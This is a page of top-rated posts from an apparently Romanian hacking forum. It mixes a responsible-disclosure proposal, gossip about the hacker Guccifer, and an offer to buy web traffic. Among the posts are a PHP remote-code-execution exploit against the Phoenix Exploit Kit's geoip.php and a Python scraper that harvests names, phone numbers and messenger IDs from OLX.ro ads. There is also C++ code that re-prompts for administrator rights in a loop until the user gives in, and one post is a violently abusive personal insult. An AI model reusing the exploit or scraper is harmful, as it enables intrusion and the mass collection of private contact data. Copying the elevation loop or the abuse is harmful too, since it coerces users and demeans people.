Leaderboard

Popular Content

Showing content with the highest reputation on 09/02/16 in all areas

  1. In 2011, two major security incidents became public in the Netherlands: the DigiNotar case (1) and a vulnerability in their public transport card (2). The National Cyber Security Centre (NCSC) of the Netherlands worked with important sectors, such as the telecommunications sector and the financial sector, to create a "Responsible disclosure" guideline. The success of this guideline can also be seen in the participation of some Dutch banks in these programs, such as SNS Bank, ING, NN and Regio Bank.

     In general there is a universal problem with such a guideline: no exact rules are specified for the reporting methodology. This is highlighted in the article "Instagram's Million Dollar Bug" (3), more precisely by this quote: "There is no rule which states what to do when a vulnerability is discovered".

     I want to create a transparent and dynamic guideline specific to web applications (which also includes the embedded devices domain), in collaboration with the public, private and civic sectors. To make this clearer, I will give an example: if there is an SQL injection in a web application, only @@version will be sent to demonstrate the concept. A common legal agreement to validate the concept and to preserve the integrity of the database.

     Through this guideline I want the following:
     - society's capacity to defend itself in the digital domain,
     - stimulating cyber security in Romania,
     - international partnerships (CERT-*, NCSC-NL),
     - easier hiring of people who work in the field, or of an intermediary.

     I will attach a platform to this guideline, in which I will present, among other things:
     - the requirements for supporting such a program,
     - standards such as ISO 30111 or ISO 29147.

     Also through this platform, I will market the people from Romania who have contributed to international cyber security (Bogdan Alecu (4), Dragos Gaftoneanu (5)) as well as those who are actively involved in this field (Daniel Bugarin (6)).

     I decided to post my project publicly because I want transparency, and this way you can see the community's feedback.

     References:
     (1) - https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
     (2) - http://www.proxmark.org/files/Documents/13.56%20MHz%20-%20MIFARE%20Classic/Reverse_engineering_the_memory_layout_of_the_OV-Chipkaart.pdf
     (3) - http://www.exfiltrated.com/research-Instagram-RCE.php
     (4) - http://www.pcworld.com/article/246528/remote_sms_attack_can_force_mobile_phones_to_send_premiumrate_text_messages.html
     (5) - http://news.softpedia.com/news/Anti-Keylogger-Application-KeyScrambler-Is-Ineffective-Expert-Says-327441.shtml
     (6) - "6th place in the world" - http://www.wechall.net/ranking

     Thank you for your attention!
    2 points
  2. I think it's Guccifer, the taxi-driver hacker.
    2 points
  3. http://a.pomf.se/pjmwvx.png

         """
         OLX.ro scraper
         Gets name, phone no., Yahoo! & Skype addresses, where applicable
         http://a.pomf.se/pjmwvx.png
         """

         import re
         import json
         import requests
         from bs4 import BeautifulSoup as b

         pages = 1  # How many pages should be scraped

         # Category URL, a.k.a. where to get the ads from
         catURL = "http://olx.ro/electronice-si-electrocasnice/laptop-calculator/"

         # Links to the Ajax requests
         ajaxNum = "http://olx.ro/ajax/misc/contact/phone/"
         ajaxYah = "http://olx.ro/ajax/misc/contact/communicator/"
         ajaxSky = "http://olx.ro/ajax/misc/contact/skype/"


         def getName(link):
             # Get the name from the ad
             page = requests.get(link)
             soup = b(page.text)
             match = soup.find(attrs={"class": "block color-5 brkword xx-large"})
             name = re.search(">(.+)<", str(match)).group(1)
             return name


         def getPhoneNum(aID):
             # Get the phone number
             resp = requests.get("%s%s/" % (ajaxNum, aID)).text
             try:
                 resp = json.loads(resp).get("value")
             except ValueError:
                 return  # No phone number
             if "span" in resp:  # Multiple phone numbers
                 nums = b(resp).find_all(text=True)
                 for num in nums:
                     if num != " ":
                         return num
             else:
                 return resp


         def getYahoo(aID):
             # Get the Yahoo! ID
             resp = requests.get("%s%s/" % (ajaxYah, aID)).text
             try:
                 resp = json.loads(resp).get("value")
             except ValueError:
                 return  # No Yahoo! ID
             else:
                 return resp


         def getSkype(aID):
             # Get the Skype ID
             resp = requests.get("%s%s/" % (ajaxSky, aID)).text
             try:
                 resp = json.loads(resp).get("value")
             except ValueError:
                 return  # No Skype ID
             else:
                 return resp


         def main():
             for pageNum in range(1, pages+1):
                 print("Page %d." % pageNum)
                 page = requests.get(catURL + "?page=" + str(pageNum))
                 soup = b(page.text)
                 links = soup.findAll(attrs={"class": "marginright5 link linkWithHash detailsLink"})
                 for a in links:
                     aID = re.search(r'ID(.+)\.', a['href']).group(1)
                     print("ID: %s" % aID)
                     print("\tName: %s" % getName(a['href']))
                     if getPhoneNum(aID) != None:
                         print("\tPhone: %s" % getPhoneNum(aID))
                     if getYahoo(aID) != None:
                         print("\tYahoo: %s" % getYahoo(aID))
                     if getSkype(aID) != None:
                         print("\tSkype: %s" % getSkype(aID))


         if __name__ == "__main__":
             main()

     Tocmai scraper: https://rstforums.com/forum/98245-tocmai-ro-scraper-nume-oras-numar-telefon.rst
    1 point
  4. Seeing the hundreds of torrent sites that are shutting down, I built a Java application that imitates the TBDEV platform, with the aim of replacing torrent websites. The main goal was to learn Java, the application being good practice because it uses as many features as possible. The application is for PCs only and cannot be run in a browser; I created it this spring, but abandoned it for lack of time.

     I would like to know whether it is worth continuing, whether it is worth making it open source, and whether there are people on the forum who want to collaborate to finish and improve it.

     Before you come with nasty comments, I want to point out that the application's design belongs to iPlay.ro, a Romanian torrent site that unfortunately no longer exists; I tried to contact that site's administrators to ask for their permission to use the design, but I could not reach them.

     Below are a few screenshots of the application:

     All images:
     https://s17.postimg.org/9cr92h9xr/Screen_Shot_2016_08_12_at_9_10_43_PM.png
     https://s17.postimg.org/hwan08ia7/Screen_Shot_2016_08_12_at_9_10_49_PM.png
     https://s17.postimg.org/aucpe1eof/Screen_Shot_2016_08_12_at_9_10_52_PM.png
     https://s17.postimg.org/6mhx5ad8v/Screen_Shot_2016_08_12_at_9_11_00_PM.png
     https://s17.postimg.org/cby5pljf3/Screen_Shot_2016_08_12_at_9_11_22_PM.png
     https://s17.postimg.org/71t6yaz67/Screen_Shot_2016_08_12_at_9_11_27_PM.png
     https://s17.postimg.org/4yirqmzdb/Screen_Shot_2016_08_12_at_9_11_35_PM.png
     https://s17.postimg.org/fzii9egzz/Screen_Shot_2016_08_12_at_9_16_56_PM.png
     https://s17.postimg.org/7vae4nukv/Screen_Shot_2016_08_12_at_9_17_06_PM.png
     https://s17.postimg.org/9odaszfrj/Screen_Shot_2016_08_12_at_9_17_14_PM.png
     https://s17.postimg.org/41gxvid8v/Screen_Shot_2016_08_12_at_9_17_27_PM.png
     https://s17.postimg.org/9qx6ftjf3/Screen_Shot_2016_08_12_at_9_17_35_PM.png
     https://s17.postimg.org/q5r3se1e7/Screen_Shot_2016_08_12_at_9_18_03_PM.png
    1 point
  5.     <?php
         /*
         #
         #  Phoenix Exploit Kit
         #  - Remote Code Execution
         #  : /includes/geoip.php
         */

         $site = "http://127.0.0.1/phoenix/";
         $target = "includes/geoip.php?bdr=";
         $payload = "passthru('uname -a')";

         function curl_get($url)
         {
             $ch = curl_init();
             curl_setopt($ch, CURLOPT_URL, $url);
             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
             $output = curl_exec($ch);
             curl_close($ch);
             return $output;
         }

         echo curl_get($site.$target.$payload);
         ?>
    1 point
  6. http://stirileprotv.ro/stiri/actualitate/instanta-suprema-decide-soarta-celui-mai-temut-hacker-roman-de-pe-planeta-7-ani-de-inchisoare-in-tara-sau-50-in-sua.html

     For fuck's sake... this loser is being called "the most feared Romanian hacker on the planet". @Stealth, you've got competition, man :\
    1 point
  7. He got 4 years: http://www.reuters.com/article/us-usa-cyber-guccifer-idUSKCN1175FB
    1 point
  8. You've earned yourself a single right: the one where we all fuck your mother as a group, so that afterwards, when she looks at her mug (fit for pushing train cars) in the mirror, she thinks she's looking at a house painter's cassette player. I hope you manage to scam just one guy. But let that guy be in a desperate situation, like many Romanians, probably taking food from his children's mouths to try to earn some money. And then, when he loses it, may he come at you with a club so that you drink your food through a straw for the rest of your life. Because the law, as badly made as it is, just blows the dust off you. And until someone takes a club to you, you won't come to your senses.
    1 point
  9.     #include <iostream>
         #include <iomanip>
         #include <Windows.h>

         using namespace std;

         BOOL IsRunAsAdmin();
         BOOL IsProcessElevated();
         DWORD GetProcessIntegrityLevel();
         BOOL Elevate();

         int main()
         {
             Elevate();
         }

         // Re-launch the current executable with the "runas" verb (which shows
         // the UAC consent prompt) until the process runs as administrator.
         BOOL Elevate()
         {
             while (IsRunAsAdmin() == FALSE)
             {
                 // Wide-character buffer, so the wide (W) APIs are used throughout.
                 wchar_t szPath[MAX_PATH];
                 if (GetModuleFileNameW(NULL, szPath, ARRAYSIZE(szPath)))
                 {
                     // Launch itself as administrator.
                     SHELLEXECUTEINFOW sei = { sizeof(sei) };
                     sei.lpVerb = L"runas";
                     sei.lpFile = szPath;
                     sei.hwnd = NULL;
                     sei.nShow = SW_NORMAL;

                     if (!ShellExecuteExW(&sei))
                     {
                         DWORD dwError = GetLastError();
                         if (dwError == ERROR_CANCELLED)
                         {
                             // The user refused the elevation.
                             // Do nothing ...
                         }
                     }
                     else
                     {
                         return TRUE; // Quit itself
                     }
                 }
                 Sleep(500);
             }
             return FALSE;
         }

         BOOL IsRunAsAdmin()
         {
             BOOL fIsRunAsAdmin = FALSE;
             DWORD dwError = ERROR_SUCCESS;
             PSID pAdministratorsGroup = NULL;

             // Allocate and initialize a SID of the administrators group.
             SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
             if (!AllocateAndInitializeSid(
                 &NtAuthority,
                 2,
                 SECURITY_BUILTIN_DOMAIN_RID,
                 DOMAIN_ALIAS_RID_ADMINS,
                 0, 0, 0, 0, 0, 0,
                 &pAdministratorsGroup))
             {
                 dwError = GetLastError();
                 goto Cleanup;
             }

             // Determine whether the SID of administrators group is enabled in
             // the primary access token of the process.
             if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))
             {
                 dwError = GetLastError();
                 goto Cleanup;
             }

         Cleanup:
             // Centralized cleanup for all allocated resources.
             if (pAdministratorsGroup)
             {
                 FreeSid(pAdministratorsGroup);
                 pAdministratorsGroup = NULL;
             }

             // Throw the error if something failed in the function.
             if (ERROR_SUCCESS != dwError)
             {
                 throw dwError;
             }

             return fIsRunAsAdmin;
         }

         BOOL IsProcessElevated()
         {
             BOOL fIsElevated = FALSE;
             DWORD dwError = ERROR_SUCCESS;
             HANDLE hToken = NULL;

             // Open the primary access token of the process with TOKEN_QUERY.
             if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
             {
                 dwError = GetLastError();
                 goto Cleanup;
             }

             // Retrieve token elevation information.
             TOKEN_ELEVATION elevation;
             DWORD dwSize;
             if (!GetTokenInformation(hToken, TokenElevation, &elevation,
                 sizeof(elevation), &dwSize))
             {
                 // When the process is run on operating systems prior to Windows
                 // Vista, GetTokenInformation returns FALSE with the
                 // ERROR_INVALID_PARAMETER error code because TokenElevation is
                 // not supported on those operating systems.
                 dwError = GetLastError();
                 goto Cleanup;
             }

             fIsElevated = elevation.TokenIsElevated;

         Cleanup:
             // Centralized cleanup for all allocated resources.
             if (hToken)
             {
                 CloseHandle(hToken);
                 hToken = NULL;
             }

             // Throw the error if something failed in the function.
             if (ERROR_SUCCESS != dwError)
             {
                 throw dwError;
             }

             return fIsElevated;
         }

         DWORD GetProcessIntegrityLevel()
         {
             DWORD dwIntegrityLevel = 0;
             DWORD dwError = ERROR_SUCCESS;
             HANDLE hToken = NULL;
             DWORD cbTokenIL = 0;
             PTOKEN_MANDATORY_LABEL pTokenIL = NULL;

             // Open the primary access token of the process with TOKEN_QUERY.
             if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
             {
                 dwError = GetLastError();
                 goto Cleanup;
             }

             // Query the size of the token integrity level information. Note that
             // we expect a FALSE result and the last error ERROR_INSUFFICIENT_BUFFER
             // from GetTokenInformation because we have given it a NULL buffer. On
             // exit cbTokenIL will tell the size of the integrity level information.
             if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cbTokenIL))
             {
                 if (ERROR_INSUFFICIENT_BUFFER != GetLastError())
                 {
                     // When the process is run on operating systems prior to Windows
                     // Vista, GetTokenInformation returns FALSE with the
                     // ERROR_INVALID_PARAMETER error code because TokenElevation
                     // is not supported on those operating systems.
                     dwError = GetLastError();
                     goto Cleanup;
                 }
             }

             // Now we allocate a buffer for the integrity level information.
             pTokenIL = (TOKEN_MANDATORY_LABEL *)LocalAlloc(LPTR, cbTokenIL);
             if (pTokenIL == NULL)
             {
                 dwError = GetLastError();
                 goto Cleanup;
             }

             // Retrieve token integrity level information.
             if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTokenIL,
                 cbTokenIL, &cbTokenIL))
             {
                 dwError = GetLastError();
                 goto Cleanup;
             }

             // Integrity Level SIDs are in the form of S-1-16-0xXXXX. (e.g.
             // S-1-16-0x1000 stands for low integrity level SID). There is one and
             // only one subauthority.
             dwIntegrityLevel = *GetSidSubAuthority(pTokenIL->Label.Sid, 0);

         Cleanup:
             // Centralized cleanup for all allocated resources.
             if (hToken)
             {
                 CloseHandle(hToken);
                 hToken = NULL;
             }
             if (pTokenIL)
             {
                 LocalFree(pTokenIL);
                 pTokenIL = NULL;
                 cbTokenIL = 0;
             }

             // Throw the error if something failed in the function.
             if (ERROR_SUCCESS != dwError)
             {
                 throw dwError;
             }

             return dwIntegrityLevel;
         }
    1 point
  10. A little smoke scattered by the wind. He was never more than that. Too many people exaggerate, trying to make him famous.
    1 point
  11. taxi driver by day and hacker by night.... this Batman of the internet :)))))))))))
    1 point
  12. He could have done something more useful, like "breaking into" Emma Watson's iCloud account. Is he the one who started "The Fappening" with Jennifer Lawrence and the rest?
    1 point
  13. He's full of talk... I started sending him traffic, he said he had transferred the money to me; 3 days have passed and the money from a bank transfer still hasn't arrived.
    -1 points
  14. I'm buying adult and NON-ADULT traffic. Any quantity, from 100 uniques per day up to 100,000 uniques. The traffic must be real (no hitleap or other nonsense). The budget is negotiable depending on quantity.
    -1 points